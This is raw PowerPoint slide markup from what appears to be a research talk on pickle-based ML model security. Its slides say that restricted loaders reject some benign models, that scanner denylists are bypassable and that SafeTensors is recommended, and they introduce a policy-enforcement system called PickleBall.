          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="629175" y="0"/>
            <a:ext cx="8514900" cy="689100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="b" bIns="34275" lIns="68575" spcFirstLastPara="1" rIns="68575" wrap="square" tIns="34275">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Existing Approaches are Insufficient</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1181" name="Google Shape;1181;p96"/>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1182" name="Google Shape;1182;p96"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1480350" y="3112700"/>
            <a:ext cx="7177200" cy="1085700"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd fmla="val 16667" name="adj"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="CFE2F3"/>
          </a:solidFill>
          <a:ln cap="flat" cmpd="sng" w="19050">
            <a:solidFill>
              <a:schemeClr val="dk2"/>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b="1" lang="en">
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:rPr>
              <a:t>Restricted loaders </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t>only permit safe callables.</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Inter Light"/>
              <a:ea typeface="Inter Light"/>
              <a:cs typeface="Inter Light"/>
              <a:sym typeface="Inter Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1400"/>
              <a:buFont typeface="Inter Light"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t>Restricted loaders use conservative allowlists that often </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t>block benign models</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Inter Light"/>
              <a:ea typeface="Inter Light"/>
              <a:cs typeface="Inter Light"/>
              <a:sym typeface="Inter Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buFont typeface="Inter Light"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t>The Weights </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t>Only Unpickler </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t>(default in PyTorch 2.6) </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" i="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:rPr>
              <a:t>fails </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" i="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:rPr>
              <a:t>to load</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t> models from </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en">
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="1" i="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:rPr>
              <a:t>15% of pickle model repositor</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" i="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:rPr>
              <a:t>ies</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr i="1">
              <a:latin typeface="Inter Light"/>
              <a:ea typeface="Inter Light"/>
              <a:cs typeface="Inter Light"/>
              <a:sym typeface="Inter Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1183" name="Google Shape;1183;p96"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1487550" y="2127500"/>
            <a:ext cx="7177200" cy="602100"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd fmla="val 16667" name="adj"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="CFE2F3"/>
          </a:solidFill>
          <a:ln cap="flat" cmpd="sng" w="19050">
            <a:solidFill>
              <a:schemeClr val="dk2"/>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b="1" lang="en">
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:rPr>
              <a:t>Model scanners </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t>analyze models to identify unsafe callables.</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Inter Light"/>
              <a:ea typeface="Inter Light"/>
              <a:cs typeface="Inter Light"/>
              <a:sym typeface="Inter Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buFont typeface="Inter Light"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t>Scanners denylists are </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" i="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:rPr>
              <a:t>bypassable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Inter Light"/>
              <a:ea typeface="Inter Light"/>
              <a:cs typeface="Inter Light"/>
              <a:sym typeface="Inter Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1184" name="Google Shape;1184;p96"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1494774" y="1055300"/>
            <a:ext cx="7162800" cy="689100"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd fmla="val 16667" name="adj"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="CFE2F3"/>
          </a:solidFill>
          <a:ln cap="flat" cmpd="sng" w="19050">
            <a:solidFill>
              <a:schemeClr val="dk2"/>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b="1" lang="en">
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:rPr>
              <a:t>Alternate formats </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t>like SafeTensors are recommended. </a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Inter Light"/>
              <a:ea typeface="Inter Light"/>
              <a:cs typeface="Inter Light"/>
              <a:sym typeface="Inter Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buFont typeface="Inter Light"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t>However, </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" i="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:rPr>
              <a:t>pickle model downloads are increasing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Inter Light"/>
              <a:ea typeface="Inter Light"/>
              <a:cs typeface="Inter Light"/>
              <a:sym typeface="Inter Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1185" name="Google Shape;1185;p96"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="491577" y="2127501"/>
            <a:ext cx="519894" cy="499831"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1186" name="Google Shape;1186;p96"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="491577" y="2127522"/>
            <a:ext cx="519900" cy="499800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="F4CCCC"/>
          </a:solidFill>
          <a:ln cap="flat" cmpd="sng" w="15750">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="sm" w="sm" type="none"/>
            <a:tailEnd len="sm" w="sm" type="none"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="ctr" bIns="75550" lIns="75550" spcFirstLastPara="1" rIns="75550" wrap="square" tIns="75550">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1156"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1187" name="Google Shape;1187;p96"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="491577" y="2127511"/>
            <a:ext cx="519894" cy="499831"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1188" name="Google Shape;1188;p96"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="593545" y="2166793"/>
            <a:ext cx="722933" cy="722933"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1189" name="Google Shape;1189;p96"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="514406" y="3427598"/>
            <a:ext cx="474300" cy="456000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="A4C2F4"/>
          </a:solidFill>
          <a:ln cap="flat" cmpd="sng" w="14350">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="sm" w="sm" type="none"/>
            <a:tailEnd len="sm" w="sm" type="none"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="ctr" bIns="68925" lIns="68925" spcFirstLastPara="1" rIns="68925" wrap="square" tIns="68925">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1055"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1190" name="Google Shape;1190;p96"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="514415" y="3427588"/>
            <a:ext cx="474232" cy="455953"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1191" name="Google Shape;1191;p96"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="342987" y="3294087"/>
            <a:ext cx="817070" cy="722922"/>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7" name="Shape 407"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="408" name="Google Shape;408;p34"/>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409" name="Google Shape;409;p34"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="629175" y="0"/>
            <a:ext cx="8514900" cy="689100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="b" bIns="34275" lIns="68575" spcFirstLastPara="1" rIns="68575" wrap="square" tIns="34275">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Attackers Abuse Pickle-Based Models</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="410" name="Google Shape;410;p34"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="605975" y="1197500"/>
            <a:ext cx="3408600" cy="1477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chemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t>Models are saved and loaded with </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" i="1" lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:rPr>
              <a:t>serialization</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" i="1" lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:rPr>
              <a:t>formats</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Inter Light"/>
              <a:ea typeface="Inter Light"/>
              <a:cs typeface="Inter Light"/>
              <a:sym typeface="Inter Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Inter Light"/>
              <a:ea typeface="Inter Light"/>
              <a:cs typeface="Inter Light"/>
              <a:sym typeface="Inter Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Inter Light"/>
              <a:ea typeface="Inter Light"/>
              <a:cs typeface="Inter Light"/>
              <a:sym typeface="Inter Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Inter Light"/>
              <a:ea typeface="Inter Light"/>
              <a:cs typeface="Inter Light"/>
              <a:sym typeface="Inter Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Inter Light"/>
              <a:ea typeface="Inter Light"/>
              <a:cs typeface="Inter Light"/>
              <a:sym typeface="Inter Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/slides/slide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1195" name="Shape 1195"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1196" name="Google Shape;1196;p97"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="629175" y="0"/>
            <a:ext cx="8514900" cy="689100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="b" bIns="34275" lIns="68575" spcFirstLastPara="1" rIns="68575" wrap="square" tIns="34275">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>P</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800"/>
              <a:t>ICKLE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>B</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800"/>
              <a:t>ALL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> Policy Enforcement</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1197" name="Google Shape;1197;p97"/>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1198" name="Google Shape;1198;p97"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3902825" y="2252725"/>
            <a:ext cx="1590300" cy="2119500"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd fmla="val 16667" name="adj"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="lt2"/>
          </a:solidFill>
          <a:ln cap="flat" cmpd="sng" w="8775">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="sm" w="sm" type="none"/>
            <a:tailEnd len="sm" w="sm" type="none"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="83975" lIns="83975" spcFirstLastPara="1" rIns="83975" wrap="square" tIns="83975">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1500">
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:rPr>
              <a:t>Policy Enforcement</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1500">
              <a:latin typeface="Inter"/>
              <a:ea typeface="Inter"/>
              <a:cs typeface="Inter"/>
              <a:sym typeface="Inter"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr b="1" sz="1285">
              <a:latin typeface="Inter"/>
              <a:ea typeface="Inter"/>
              <a:cs typeface="Inter"/>
              <a:sym typeface="Inter"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
